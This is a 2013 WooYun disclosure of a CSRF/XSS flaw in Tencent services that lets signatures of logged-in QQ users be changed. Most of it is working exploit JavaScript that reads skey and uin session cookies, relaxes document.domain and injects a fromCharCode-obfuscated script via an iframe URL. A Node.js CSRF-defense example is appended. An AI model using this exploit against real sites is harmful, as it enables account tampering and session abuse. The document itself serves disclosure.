
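Vulnerability summary

Bug ID: wooyun-2013-026966

Title: Arbitrary modification of other users' QQ signatures (some users have already been affected)

Vendor: Tencent

Author: zzzmode

Submitted: 2013-06-26 16:59

Fixed: 2013-08-10 17:00

Disclosed: 2013-08-10 17:00

Vulnerability type: CSRF

Severity: Medium

Self-assessed Rank: 2

Status: Confirmed by vendor

Source: http://www.wooyun.org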

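Vulnerability details

Disclosure status:

2013-06-26: Details reported to the vendor, awaiting vendor handling
2013-06-26: Vendor has confirmed; details disclosed to the vendor only
2013-07-06: Details disclosed to core white hats and experts in the relevant fields
2013-07-16: Details disclosed to regular white hats
2013-07-26: Details disclosed to trainee white hats
2013-08-10: Details disclosed to the public

Brief description:

Once a user has visited the relevant Tencent services, their QQ signature can be modified just by having them browse a page.

Detailed description: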

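function change_sign(){
    // Read the login cookies (skey, uin) from document.cookie
    var skey=document.cookie.match(/skey=(@\w+)/)[1],
        uin=parseInt(document.cookie.match(/uin=o(\d+)/)[1],10);
    // State-changing GET: the cookie values are passed as query parameters
    new Image().src='http://data.soso.com/bingo/72/ChangeLn.php?uin='+uin+'&skey='+skey+'&ln=这里是签名内容';
}
window.onload=function(){
    if(!window.ActiveXObject){
        // Non-IE branch: relax document.domain to "com" to match the proxy page
        document.domain="com";
        var iframe = document.createElement('iframe');
        iframe.style.display = 'none';
        iframe.onload = function(){
            // Run change_sign with the iframe's window in scope
            with(this.contentWindow){
                eval('!'+change_sign+'()');
            }
        };
        iframe.src = 'http://face.qq.com/ajax.proxy.html?domain=com';
        document.body.appendChild(iframe);
    }else{
        // IE branch: the same logic is delivered through a script injected via the iframe URL
        var iframe = document.createElement('iframe');
        iframe.style.display = 'none';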
iframe.src = 'http://game.wang.qq.com/game.html#?areaId="></object><script/defer>eval(String.fromCharCode(115,107,101,121,61,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,109,97,116,99,104,40,47,115,107,101,121,61,40,64,92,119,43,41,47,41,91,49,93,44,117,105,110,61,112,97,114,115,101,73,110,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,46,109,97,116,99,104,40,47,117,105,110,61,111,40,92,100,43,41,47,41,91,49,93,44,49,48,41,59,110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,39,104,116,116,112,58,47,47,100,97,116,97,46,115,111,115,111,46,99,111,109,47,98,105,110,103,111,47,55,50,47,67,104,97,110,103,101,76,110,46,112,104,112,63,117,105,110,61,39,43,117,105,110,43,39,38,115,107,101,121,61,39,43,115,107,101,121,43,39,38,108,110,61,37,69,55,37,56,56,37,66,49,37,69,55,37,57,70,37,65,53,37,69,52,37,66,57,37,56,69,37,69,70,37,66,67,37,56,67,37,69,55,37,56,56,37,66,49,80,75,65,86,37,69,70,37,66,67,37,56,49,39,59))<\/script>';
        document.body.appendChild(iframe);
    }
}

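Proof of vulnerability:

Open it yourself and try it and you will see. The precondition is having logged in and browsed a Tencent service. It is very easy to test.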

[Screenshots: qq1.jpg, qq2.jpg, qq3.png]

Fix:

Copyright notice: when reposting, please credit the source zzzmode@WooYun
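
The request in the report changes state through a GET whose only credential is the skey cookie value, read from document.cookie and copied into the query string. As an added example (not part of the original report and not Tencent's code), these are server-side checks in Node.js that reject such a request; the origin allow-list, the secret, the `sid` cookie and the `X-CSRF-Token` header are assumed names.

```javascript
'use strict';
const crypto = require('node:crypto');

// Hypothetical names (not from the report): ALLOWED_ORIGINS, CSRF_SECRET,
// the `sid` cookie, the X-CSRF-Token header and the request object shape.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
const CSRF_SECRET = crypto.randomBytes(32);

// Session cookie flags: HttpOnly hides the value from document.cookie, which
// is where the report's script reads skey; SameSite limits cross-site sends.
function sessionCookie(sid) {
  return `sid=${sid}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// CSRF token = HMAC(server secret, session id). It is delivered in page
// content and sent back in a header, so it is never the cookie value itself.
function issueCsrfToken(sid) {
  return crypto.createHmac('sha256', CSRF_SECRET).update(sid).digest('hex');
}

function safeEqual(a, b) {
  const x = Buffer.from(String(a)), y = Buffer.from(String(b));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// Decide whether a state-changing request (e.g. "change signature") is allowed.
function checkStateChange(req) {
  if (req.method !== 'POST') return 'reject: state change over ' + req.method;
  if (!ALLOWED_ORIGINS.has(req.headers.origin)) return 'reject: origin';
  const sid = req.cookies.sid;
  if (!sid) return 'reject: no session';
  const token = req.headers['x-csrf-token'];
  if (!token || !safeEqual(token, issueCsrfToken(sid))) return 'reject: token';
  return 'accept';
}

// Constructed sample requests (not captured traffic).
const sid = 'constructed-session-id';
const samples = {
  // Shape of the request in the report: a GET fired by an image load.
  imageGet: { method: 'GET', headers: {}, cookies: { sid } },
  // Cross-site form POST carrying the session cookie and a foreign Origin.
  foreignPost: { method: 'POST', headers: { origin: 'https://other.example' }, cookies: { sid } },
  // Right origin, but the cookie value replayed as the token.
  cookieAsToken: { method: 'POST', headers: { origin: 'https://app.example.com', 'x-csrf-token': sid }, cookies: { sid } },
  legit: { method: 'POST', headers: { origin: 'https://app.example.com', 'x-csrf-token': issueCsrfToken(sid) }, cookies: { sid } },
};
for (const [name, req] of Object.entries(samples)) console.log(name, '->', checkStateChange(req));
```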


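Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2013-06-26 18:26

Vendor reply:

Thank you very much for your report. We have confirmed this issue and are working with the business unit to develop a solution. We will share any new progress promptly.

Latest status:

None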